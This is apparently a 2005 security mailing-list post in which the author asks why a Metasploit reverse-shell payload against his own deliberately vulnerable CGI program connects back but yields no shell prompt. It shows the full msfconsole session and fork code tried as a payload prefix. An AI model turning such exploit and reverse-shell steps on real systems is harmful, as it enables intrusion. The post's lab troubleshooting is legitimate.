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Can't seem to get a shell prompt from linux_ia32_reverse

From: jwasser at (John Wasser)
Date: Tue, 05 Apr 2005 16:46:25 -0400

As an exercise I created a CGI application (Apache under Fedora Core 3
Linux) with a buffer overflow vulnerability and a  Metasploit exploit
for it.  The exploit works and the payload executes but when I use the
linux_ia32_reverse payload I don't get a shell prompt. The Reverse
Handler gets the connection but no prompt:
[root at xxxxx framework-2.3]# ./msfconsole

+ -- --=[ msfconsole v2.3 [59 exploits - 69 payloads]

msf > use SkaionRegForm
msf SkaionRegForm > set PAYLOAD linux_ia32_reverse
PAYLOAD -> linux_ia32_reverse
msf SkaionRegForm(linux_ia32_reverse) > set LHOST localhost
LHOST -> localhost
msf SkaionRegForm(linux_ia32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Trying exploit target Fedora Core 3 Bruteforce
[*] RawPayload Length=70, EncodedPayload length=94, Nops=162,
fullPayload Length=256
[*] Brute forcing bffff280 => bffff380 (step 161)...
[*] Trying bffff280...
[*] Trying bffff321...
[*] Got connection from <->

[*] Exiting Reverse Handler.

msf SkaionRegForm(linux_ia32_reverse) >
The time between "Got connection" and "Exiting Reverse Handler" is
roughly a second.

I tried various code in PayloadPrepend() including binary for:
if (fork()) exit(0);
if (!fork()){if(fork())exit(0);}else exit(0);  // Double Fork
and various combinations thereof...  In all cases I still got the
reverse connection indicating that the payload code was executing but in
no case did I ever get a shell prompt.

Any suggestions? 

Apache: 2.0.52
OS: Fedora Core 3
/proc/sys/kernel/exec-shield = 0
/proc/sys/kernel/exec-shield-randomize = 0

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